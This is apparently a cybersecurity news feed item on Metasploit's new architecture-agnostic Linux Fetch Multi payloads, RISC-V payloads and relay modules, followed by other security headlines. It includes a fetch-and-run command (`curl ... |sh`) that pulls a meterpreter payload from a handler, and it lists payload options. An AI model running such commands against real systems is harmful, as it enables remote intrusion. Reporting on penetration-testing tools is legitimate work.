LIVE · cybersecurity feed
Live wire
metasploitmedium

Metasploit Adds Linux Fetch Multi Payload for Architecture Agnostic Exploits

The Metasploit Framework has introduced a new Linux Fetch Multi payload family. This enhancement allows for on-the-fly identification of the target host's architecture, enabling a single payload and handler to serve multiple Linux targets without manual architecture selection. This feature is available for HTTP and HTTPS-based fetch payloads.

zeroday.news · 15d ago

The Metasploit Framework has introduced a new Linux Fetch Multi payload family, designed to simplify exploitation by automatically identifying and delivering the correct architecture-specific payload to a target Linux host. This enhancement means that users no longer need to manually determine a target's architecture when selecting a payload, as a single payload and handler can now serve multiple targets with different architectures.

The Fetch Multi payloads operate by adding a query string to the request, allowing the handler to receive the target's architecture information. Consequently, only HTTP and HTTPS-based fetch payloads currently support this new functionality. An example provided demonstrates how a single command, `curl -s http://10.5.135.210:8080/x|sh`, can be executed on diverse targets (mipsel, mips64, and aarch64 hosts), with the handler automatically serving the appropriate ELF architecture payload for each.

The `cmd/linux/http/multi/meterpreter_reverse_tcp` payload module offers several configuration options, including `FETCH_COMMAND` (supporting CURL, FTP, GET, TFTP, TNFTP, WGET), `FETCH_DELETE` to attempt binary deletion after execution, and `FETCH_FILELESS` for running payloads without writing to disk on Linux versions 3.17 or newer. Other options include `FETCH_SRVHOST`, `FETCH_SRVPORT` (defaulting to 8080), `FETCH_URIPATH`, `LHOST`, and `LPORT` (defaulting to 4444). When using CURL, GET, or WGET, `FETCH_PIPE` can be set to true to pipe the binary payload and command directly to the shell.

In addition to the Fetch Multi payloads, the Metasploit Framework has expanded its support for the RiscV architecture. This includes staged and stageless shell payloads for both 32-bit and 64-bit RiscV systems, along with XOR encoders specifically for RiscV payloads.

Recent module additions to the framework include a Microsoft Windows HTTP to SMB Relay auxiliary module, developed by jheysel-r7. This module allows for relaying incoming NTLM HTTP authentication requests to multiple SMB servers to establish sessions. The Byte XORi Encoder, contributed by bcoles, adds four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.

Further contributions from Brendan Watters, Spencer McIntyre, and bcoles include new Linux fetch multi payloads, a fetch server for FTP-based payloads, and a TFTP server. These additions introduce 421 new payloads across all Linux and Windows architectures, such as `cmd/linux/ftp/aarch64/chmod`, `cmd/linux/ftp/x86/meterpreter/reverse_tcp`, and `cmd/windows/ftp/aarch64/meterpreter_reverse_http`.

Finally, new stagers and shell command stages have been added for RISC-V 64-bit and 32-bit little-endian Linux targets. These include `reverse_tcp` and `bind_tcp` stagers for various protocols like FTP, HTTP, HTTPS, and TFTP, expanding the framework's capabilities for exploiting RiscV-based systems.

metasploitexploitationlinuxpayloadspentesting
ShareXLinkedInWhatsAppFacebook

More News

view all →
vulnerability

Coldcard Hardware Wallet Flaw Linked to $70 Million Bitcoin Theft in 41 Minutes

An attacker drained 1,196 Bitcoin addresses in 41 minutes on July 30, taking 1,082.65 BTC worth about $70.2 million at the time. Galaxy Research mapped the sweep and tied it to a firmware flaw in Coldcard, the Bitcoin-only hardware wallet made by Canadian firm Coinkite. A March 2021 firmware integration error routed seed generation to a deterministic software pseudorandom number generator (PRNG

vulnerabilitycritical

Rails patches critical Active Storage flaw with RCE potential

A critical vulnerability in the Active Storage framework can allow an unauthenticated attacker to read arbitrary files from a Rails application, and potentially escalate to remote code execution (RCE). [...]

malware

Russian Hackers Hijack Hotel Wi-Fi to Steal Microsoft 365 Tokens

Microsoft says Russian hackers hijacked hotel Wi-Fi portals to spread malware and steal Microsoft 365 tokens from travelers. Microsoft Threat Intelligence disclosed CaptiveCrunch, a campaign it attributes to Storm-2945, an operational sub-cluster of Midnight Blizzard, the Russian SVR-linked group also known as APT29 and Cozy Bear. Since early May 2026, Storm-2945 has been manipulating DNS […]

CVE-2026-48449critical

Adobe fixed a maximum-severity vulnerability flaw in Campaign Classic

Adobe fixed a maximum severity vulnerability in Campaign Classic that could let attackers run code remotely without user interaction. Adobe has addressed a critical vulnerability, tracked as CVE-2026-48449 (CVSS score of 10.0), in Adobe Campaign Classic, the company’s enterprise marketing automation platform. The flaw is caused by incorrect authorization and could allow attackers to execute […]

security

Balance Theory Raises $19 Million to Help Enterprises Manage Cybersecurity Investments

The funding round was led by SYN Ventures, with participation from existing investors DataTribe and TEDCO. The post Balance Theory Raises $19 Million to Help Enterprises Manage Cybersecurity Investments appeared first on SecurityWeek.

vulnerabilitycritical

Ruby on Rails Patches Critical Vulnerability

The flaw can be exploited by unauthenticated attackers to read arbitrary files and potentially achieve remote code execution (RCE). The post Ruby on Rails Patches Critical Vulnerability appeared first on SecurityWeek.